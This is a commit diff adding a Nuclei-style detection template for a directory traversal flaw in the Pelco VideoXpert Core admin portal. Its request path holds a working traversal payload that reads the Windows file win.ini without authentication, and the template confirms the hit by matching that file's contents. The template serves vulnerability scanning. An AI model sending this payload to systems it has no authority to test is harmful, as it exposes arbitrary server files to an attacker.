Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml
parent
c4f36adbb6
commit
2a268f1324
|
@ -0,0 +1,23 @@
|
|||
id: schneider-electric-pelco-videoxpert-core-admin-portal-lfi
|
||||
|
||||
info:
|
||||
name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
|
||||
author: 0x_akoko
|
||||
severity: high
|
||||
description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
|
||||
tags: windows,lfi,schneider
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue